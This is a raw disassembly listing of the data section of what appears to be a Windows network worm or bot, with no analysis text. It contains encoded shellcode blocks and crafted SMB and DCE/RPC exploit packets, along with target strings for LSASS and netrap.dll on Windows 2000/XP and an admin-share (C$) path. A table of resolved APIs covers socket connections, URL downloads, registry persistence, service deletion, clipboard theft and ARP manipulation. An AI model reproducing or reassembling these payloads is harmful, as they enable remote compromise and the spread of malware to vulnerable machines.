loc_42CF22: ; CODE XREF: .data:loc_42CF10�j
call sub_42CF12
loc_42CF27: ; CODE XREF: sub_42CF12+E�j
jo short near ptr dword_42CE94+2Ah
cwde
cdq
cdq
retn
sub_42CF12 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_42CFC0 dw 4B9Dh ; DATA XREF: .text:004137FB�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_42D0A8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:004139C5�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_42D138 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004139F7�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_42D1E8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413A22�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42D2C8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413765�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_5: ; DATA XREF: .text:004137A8�o
unicode 0, <C$>,0
a?????_0 db '?????',0
align 10h
dword_42D330 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413A7A�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_42D3A0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413AA5�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_42D448 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413AD9�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42D4C8 dd offset loc_401495 ; DATA XREF: .text:00413B09�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_42D560 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413B3B�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_42D5D0 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413B60�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_42D648 dd 0 dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_42D708 dd 1004600h ; .text:00413880�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 3 dup(0)
dd 9875h, 9873h
off_42D798 dd offset sub_414EFD ; DATA XREF: sub_415F5B�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
dword_42D7B0 dd 19930520h, 3 dup(0) ; sub_415A46+2�o
off_42D7C0 dd offset sub_4160A4 ; DATA XREF: sub_4162A0+1C�r
dword_42D7C4 dd 2 ; sub_41B740+E�r ...
off_42D7C8 dd offset aNull_1 ; DATA XREF: sub_416662:loc_416A28�r
; sub_416662+4E4�r
; "(null)"
off_42D7CC dd offset aNull ; DATA XREF: sub_416662+2AC�r
; "(null)"
dword_42D7D0 dd 0FFFFFFFFh ; sub_416DF7+16�w ...
align 10h
dd 43h, 0
dword_42D7E8 dd 1, 8 dup(0) ; .data:off_42D83C�o
dd 2 dup(1), 3 dup(0)
dd offset off_42E1C4
align 10h
dd offset word_4290E2
dd offset off_42E108
dd 0
off_42D83C dd offset dword_42D7E8 ; DATA XREF: sub_4148EA+A�r
; sub_415136+1C�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 21h dup(0)
off_42D978 dd offset dword_47C9A0 ; DATA XREF: sub_417F3B+52�o
; sub_417FF8+4�o ...
align 10h
dd offset dword_47C9A0
dd 101h
dword_42D988 dd 2 dup(0) dd 1000h, 0
dword_42D998 dd 3 dup(0) ; sub_41AB2C+12�o
dd 2, 1, 3 dup(0)
dword_42D9B8 dd 3 dup(0) ; sub_41AB2C:loc_41AB4A�o
dd 2 dup(2), 7 dup(0)
dword_42D9E8 dd 7Ch dup(0) dword_42DBD8 dd 8 dup(0) ; sub_41804A+D�o
dword_42DBF8 dd 10h, 0 dword_42DC00 dd 0 ; sub_41819C+8�o ...
dword_42DC04 dd 1 dd 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 22h dup(0)
dword_42DD20 dd 1 ; sub_41819C+4A�o ...
dword_42DD24 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_42DE88 dd offset sub_41DDE6 ; DATA XREF: sub_414EC5+5�w
; sub_416662+43E�r
off_42DE8C dd offset sub_41DDE6 ; DATA XREF: sub_414EC5+A�w
; sub_416662+46A�r
off_42DE90 dd offset sub_41DDE6 ; DATA XREF: sub_414EC5+14�w
; sub_416F0B+40D�r
off_42DE94 dd offset sub_41DDE6 ; DATA XREF: sub_414EC5+1E�w
; sub_416662+459�r
off_42DE98 dd offset sub_41DDE6 ; DATA XREF: sub_414EC5+28�w
off_42DE9C dd offset sub_41DDE6 ; DATA XREF: sub_414EC5+32�w
off_42DEA0 dd offset word_4290E2 ; DATA XREF: sub_41524A:loc_41531C�r
; sub_416662:loc_416861�r ...
off_42DEA4 dd offset word_4292EA ; DATA XREF: sub_41F913+18�r
dword_42DEA8 dd 0BB40E64Eh ; sub_416662+9�r ...
dd offset loc_41E30F
off_42DEB0 dd offset sub_41AA6F ; DATA XREF: sub_41AAA4+C�r
align 10h
byte_42DEC0 db 1 ; DATA XREF: sub_41AE37+C8�r
db 2, 4, 8
align 8
dword_42DEC8 dd 3A4h dword_42DECC dd 82798260h dd 21h, 0
dword_42DED8 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_42DFB8 dd 2 ; sub_41B5C9+32�r
off_42DFBC dd offset aR6002FloatingP ; DATA XREF: sub_41B5C9+DE�r
; sub_41B5C9+11B�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 429874h, 9, 429848h, 0Ah, 4297B0h, 10h, 429784h
dd 11h, 429754h, 12h, 429730h, 13h, 429704h, 18h, 4296CCh
dd 19h, 4296A4h, 1Ah, 42966Ch, 1Bh, 429634h, 1Ch, 42960Ch
dd 78h, 4295FCh, 79h, 4295ECh, 7Ah, 4295DCh, 0FCh, 4219D0h
dd 0FFh, 4295CCh
dword_42E048 dd 0C0000005h, 0Bh, 0 ; sub_416E86+47�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_42E0C0 dd 3 ; sub_41B779+A3�r ...
dword_42E0C4 dd 7 ; sub_41B779+A9�r ...
dd 78h
dword_42E0CC dd 0Ah ; sub_41F035�r
dword_42E0D0 dd 0FFFFFFFFh, 0A80h, 7 dup(0) ; sub_418DD9:loc_418E5F�o
dword_42E0F4 dd 1 byte_42E0F8 db 2Eh ; DATA XREF: sub_416F0B:loc_417216�r
; sub_416F0B+329�r ...
align 4
dd 1, 42E108h, 0
off_42E108 dd offset aSun ; DATA XREF: .data:0042D834�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 1, 0
dword_42E1C0 dd 2Eh off_42E1C4 dd offset dword_42E1C0 ; DATA XREF: sub_41C8FA+15�r
; .data:0042D820�o ...
off_42E1C8 dd offset dword_47C488 ; DATA XREF: sub_41C8FA+32�r
off_42E1CC dd offset dword_47C488 ; DATA XREF: sub_41C8FA+4E�r
off_42E1D0 dd offset dword_47C488 ; DATA XREF: sub_41C959+1B�r
off_42E1D4 dd offset dword_47C488 ; DATA XREF: sub_41C959+38�r
off_42E1D8 dd offset dword_47C488 ; DATA XREF: sub_41C959+55�r
off_42E1DC dd offset dword_47C488 ; DATA XREF: sub_41C959+72�r
off_42E1E0 dd offset dword_47C488 ; DATA XREF: sub_41C959+8F�r
off_42E1E4 dd offset dword_47C488 ; DATA XREF: sub_41C959+AC�r
off_42E1E8 dd offset dword_47C488 ; DATA XREF: sub_41C959+C8�r
dd 2 dup(7F7F7F7Fh)
off_42E1F4 dd offset off_42E1C4 ; DATA XREF: sub_41C8FA+B�r
; sub_41C8FA+27�r ...
align 10h
dd 1, 3 dup(0)
dword_42E210 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_42E228 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 7080h, 1, 0FFFFF1F0h
; DATA XREF: sub_41DBA7�o
dd 0
dword_42E250 dd 545350h, 0Fh dup(0)dword_42E290 dd 544450h, 0Fh dup(0) dd offset dword_42E250
dd offset dword_42E290
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 2 dup(0)
dword_42E360 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_42E4C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_41F4DB+26�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_42E620 dd 0 ; sub_4017F1+CF�w ...
dword_42E624 dd 0 ; sub_401B9D+EE�w ...
dd 3E6h dup(0)
dword_42F5C0 dd 6 dup(0) ; sub_401967+129�o ...
dword_42F5D8 dd 0 ; sub_401141+35E�o
dword_42F5DC dd 0A2h dup(0) dword_42F864 dd 41h dup(0) dword_42F968 dd 0 ; sub_401141+30C�r
align 10h
dword_42F970 dd 0 ; sub_401141+370�r
dword_42F974 dd 0 dword_42F978 dd 0 dword_42F97C dd 0 dd 0
dword_42F984 dd 0 dword_42F988 dd 0 ; sub_401141+215�r ...
dword_42F98C dd 41h dup(0) dword_42FA90 dd 41h dup(0) dword_42FB94 dd 0 ; sub_401141+261�r
dword_42FB98 dd 0 dword_42FB9C dd 0 ; sub_401141+20F�r
dword_42FBA0 dd 20h dup(0) ; sub_401141+1FA�o
dword_42FC20 dd 0 dword_42FC24 dd 0 ; sub_401141+204�w
dword_42FC28 dd 0 align 10h
dword_42FC30 dd 0 ; sub_401141+102�o
dword_42FC34 dd 41h dup(0) dword_42FD38 dd 41h dup(0) dword_42FE3C dd 0 ; sub_401141+114�r
dword_42FE40 dd 0 dword_42FE44 dd 0 ; sub_401141+CF�r
dword_42FE48 dd 20h dup(0) ; sub_401141+BA�o
dword_42FEC8 dd 0 dword_42FECC dd 0 ; sub_401141+C4�w
dword_42FED0 dd 0 align 8
dword_42FED8 dd 1000h dup(0) ; sub_401F9F�o ...
dword_433ED8 dd 0Dh dup(0) ; sub_401F9F+E�o ...
dword_433F0C dd 0 dword_433F10 dd 200h dup(0) ; sub_403512+97�o ...
dword_434710 dd 0 ; resolved to->NTDLL.ZwQuerySystemInformation ; sub_4031EB+65�r ...
dword_434714 dd 0 ; resolved to->NTDLL.RtlRunDecodeUnicodeString ; sub_4036C9+53�r ...
dword_434718 dd 200h dup(0) ; sub_403512+AE�o ...
dword_434F18 dd 0 ; resolved to->NTDLL.RtlCreateQueryDebugBuffer ; sub_4037CA+85�w
dword_434F1C dd 0 ; resolved to->NTDLL.RtlQueryProcessDebugInformation ; sub_4037CA+92�w
dword_434F20 dd 0 ; resolved to->NTDLL.RtlDestroyQueryDebugBuffer ; sub_4031EB+173�r ...
dword_434F24 dd 0 ; sub_403637+2F�r ...
dword_434F28 dd 0 ; sub_403512+FF�w
dword_434F2C dd 0 ; sub_403512+105�w ...
dword_434F30 dd 0 ; sub_403637+49�r
align 8
dword_434F38 dd 80h dup(0) dword_435138 dd 80h dup(0) dword_435338 dd 0 ; sub_403B2C+51�r ...
dword_43533C dd 0 ; sub_403C3B+6A�w ...
byte_435340 db 0 ; DATA XREF: sub_405367+11E�w
; sub_405367+220�o
align 2
word_435342 dw 0 ; DATA XREF: sub_405367+12B�w
word_435344 dw 0 ; DATA XREF: sub_405367+136�w
word_435346 dw 0 ; DATA XREF: sub_405367+13F�w
byte_435348 db 0 ; DATA XREF: sub_405367+145�w
byte_435349 db 0 ; DATA XREF: sub_405367+14C�w
word_43534A dw 0 ; DATA XREF: sub_405367+153�w
dword_43534C dd 0 ; sub_405367+19B�w
dword_435350 dd 0 byte_435354 db 0 ; DATA XREF: sub_405367+1B2�w
byte_435355 db 0 ; DATA XREF: sub_405367+1C2�w
word_435356 dw 0 ; DATA XREF: sub_405367+1D5�w
word_435358 dw 0 ; DATA XREF: sub_405367+1E7�w
word_43535A dw 0 ; DATA XREF: sub_405367+1DD�w
dword_43535C dd 100h dup(0) dword_43575C dd 0 ; resolved to->WSOCK32.recv ; sub_4039C6+F8�r ...
dword_435760 dd 0 ; resolved to->WS2_32.getsockname ; sub_4057AC+72C�r ...
dword_435764 dd 0 ; sub_4057AC+9AE�r ...
dword_435768 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_4057AC+834�r
dword_43576C dd 0 ; resolved to->WS2_32.WSASocketA ; sub_4057AC+4C8�w ...
dword_435770 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_4057AC+7F5�r ...
dword_435774 dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_4057AC+8C�w ...
dword_435778 dd 0 ; resolved to->USER32.CloseClipboard ; sub_4057AC+1E2�r ...
dword_43577C dd 0 ; resolved to->USER32.IsWindow ; sub_4057AC+1C2�r
dword_435780 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_4057AC+6FC�r ...
dword_435784 dd 0 ; resolved to->GDI32.SelectObject ; sub_4057AC+463�r
dword_435788 dd 0 dword_43578C dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_404F24+B1�r ...
dword_435790 dd 0 ; resolved to->WININET.InternetOpenA ; sub_4057AC+7FB�r
dword_435794 dd 0 ; resolved to->USER32.OpenClipboard ; sub_4057AC+1D2�r ...
dword_435798 dd 0 ; resolved to->KERNEL32.Process32Next ; sub_4057AC+CA�r ...
dword_43579C dd 0 ; sub_4057AC+99E�r ...
dword_4357A0 dd 0 ; resolved to->WS2_32.connect ; sub_4039C6+8D�r ...
dword_4357A4 dd 0 ; sub_4057AC+BA6�r ...
dword_4357A8 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_4057AC+27C�r
dword_4357AC dd 0 ; resolved to->WS2_32.accept ; sub_4057AC+5E6�w ...
dword_4357B0 dd 0 ; .text:00413FB8�r
dword_4357B4 dd 0 ; sub_4057AC+9B6�r ...
dword_4357B8 dd 0 ; resolved to->WS2_32.sendto ; sub_405367+228�r ...
dword_4357BC dd 0 ; resolved to->SHELL32.SHChangeNotifydword_4357C0 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_4057AC+AD�r ...
dword_4357C4 dd 0 ; sub_4057AC+AD6�r ...
dword_4357C8 dd 0 ; sub_4057AC+9C6�r ...
dword_4357CC dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_4057AC+23E�w ...
dword_4357D0 dd 0 ; sub_4057AC+981�r ...
dword_4357D4 dd 0 ; sub_4057AC+9CE�r ...
dword_4357D8 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_4057AC+BA�r ...
dword_4357DC dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_4057AC+367�r ...
dword_4357E0 dd 0 ; resolved to->USER32.DestroyWindow ; sub_4057AC+1CA�r
dword_4357E4 dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_4057AC+72�w ...
dword_4357E8 dd 0 ; resolved to->WS2_32.socket ; sub_4039C6+45�r ...
dword_4357EC dd 0 ; sub_4057AC+98E�r ...
dword_4357F0 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_4057AC+7D4�w ...
dword_4357F4 dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_4057AC+A5D�r ...
dword_4357F8 dd 0 ; resolved to->WS2_32.WSAStartup ; sub_4049D5+16�r ...
dword_4357FC dd 0 ; sub_4076EC+72�r
dword_435800 dd 0 ; resolved to->KERNEL32.Module32First ; sub_408206+15C�r ...
dword_435804 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_405367+76�r ...
dword_435808 dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_4057AC+EA�r ...
dword_43580C dd 0 ; sub_4057AC+BB6�r ...
dword_435810 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_4057AC+810�r
dword_435814 dd 0 ; resolved to->GDI32.DeleteDC ; sub_4057AC+473�r
dword_435818 dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4057AC+36F�r ...
dword_43581C dd 0 ; resolved to->WININET.InternetConnectA ; sub_4057AC+820�r
dword_435820 dd 0 ; sub_4057AC+9A6�r ...
dword_435824 dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_4057AC+258�w ...
dword_435828 dd 0 ; resolved to->WS2_32.getpeername ; sub_40F563+E3�r
dword_43582C dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4057AC+F2�r
dword_435830 dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_4057AC+231�w ...
dword_435834 dd 0 ; resolved to->KERNEL32.Process32First ; sub_4057AC+C2�r ...
dword_435838 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_4057AC+8B6�r ...
dword_43583C dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_4057AC+4E2�w ...
dword_435840 dd 0 ; resolved to->USER32.FindWindowA ; sub_4057AC+1BA�r ...
dword_435844 dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_4057AC+801�w
dword_435848 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_4057AC+73C�r ...
dword_43584C dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_435850 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_40819B+55�r
dword_435854 dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_407C73+98�r
